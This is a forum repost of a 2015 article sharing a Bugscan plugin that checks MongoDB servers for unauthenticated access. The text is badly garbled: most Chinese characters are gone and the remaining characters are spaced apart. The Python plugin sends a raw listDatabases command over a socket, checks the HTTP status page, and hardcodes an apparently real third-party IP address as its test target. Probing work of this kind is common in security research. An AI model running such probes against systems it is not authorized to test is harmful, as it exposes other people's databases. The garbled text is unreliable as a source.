搜索

[2348] 2015-10-09_【POC】Bugscan扫描插件分享之mongodb未授权访问检测

文档创建者:s7ckTeam
浏览次数:2
最后更新:2025-01-16
2015-10-09_【POC】Bugscan扫描插件分享之mongodb未授权访问检测 P O C B u g s c a n m o n g o d b   访 E   2 0 1 5 - 1 0 - 0 9 E E I D : E A Q a p p m o n g o d b M o n g o   D B   I T ( N o S q l ) , I T M o n g o   D B ( O O ) , M o n g o   D B   D o c u m e n t M o n g o   D B S Q L , C R U D M o n g o d b 访 m o n g o d b + 1 0 0 0 w e b M o n g o D B   ,   M o n g o D B   ,   M o n g o D B     ,   r o o t   , 访 m o n g o d b 访 # ! / u s r / b i n / e n v   p y t h o n #   - * -   c o d i n g :   u t f - 8   - * - # _ _ a u t h o r _ _   =   ' 西 ' i m p o r t   s o c k e t d e f   a u d i t ( a r g ) : i p , p o r t   =   a r g i n f o   =   [ ] t r y : s   =   s o c k e t . s o c k e t ( ) s . c o n n e c t ( ( i p , p o r t ) ) s . s e n d ( " x 3 F x 0 0 x 0 0 x 0 0 x 7 E x 0 0 x 0 0 x 0 0 x 0 0 x 0 0 x 0 0 x 0 0 x D 4 x 0 7 x 0 0 x 0 0 x 0 4 x 0 0 x 0 0 x 0 0 x 6 1 x 6 4 x 6 D x 6 9 x 6 E x 2 E x 2 4 x 6 3 x 6 D x 6 4 x 0 0 x 0 0 x 0 0 x 0 0 x 0 0 x F F x F F x F F x F F x 1 8 x 0 0 x 0 0 x 0 0 x 1 0 x 6 C x 6 9 x 7 3 x 7 4 x 4 4 x 6 1 x 7 4 x 6 1 x 6 2 x 6 1 x 7 3 x 6 5 x 7 3 x 0 0 x 0 1 x 0 0 x 0 0 x 0 0 x 0 0 " ) d a t a   =   s . r e c v ( 1 0 2 4 ) i f   ' l o c a l '   i n   d a t a : s e c u r i t y _ h o l e ( " % s : % d "   %   ( i p , p o r t ) ) s . c l o s e ( ) e x c e p t : p a s s u r l   =   ' h t t p : / / % s : % d / '   %   ( i p , p o r t + 1 0 0 0 ) c o d e   , _   , b o d y   , _ , _   =   c u r l . c u r l ( u r l ) i f   c o d e   = =   2 0 0   a n d   ' d b   v e r s i o n '   i n   b o d y : s e c u r i t y _ i n f o ( u r l ) d e f   a s s i g n ( s e r v i c e ,   a r g ) : i f   s e r v i c e   = =   " m o n g o d b " : r e t u r n   T r u e ,   a r g i f   _ _ n a m e _ _   = =   ' _ _ m a i n _ _ ' : f r o m   d u m m y   i m p o r t   * a u d i t ( a s s i g n ( ' m o n g o d b ' ,   ( ' 5 8 . 2 1 5 . 1 8 5 . 1 5 4 ' , 2 7 0 1 7 ) ) [ 1 ] )
访 访 b u g s c a n h t t p : / / q . b u g s c a n . n e t / h t t p s : / / w w w . b u g s c a n . n e t   E E E 便
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理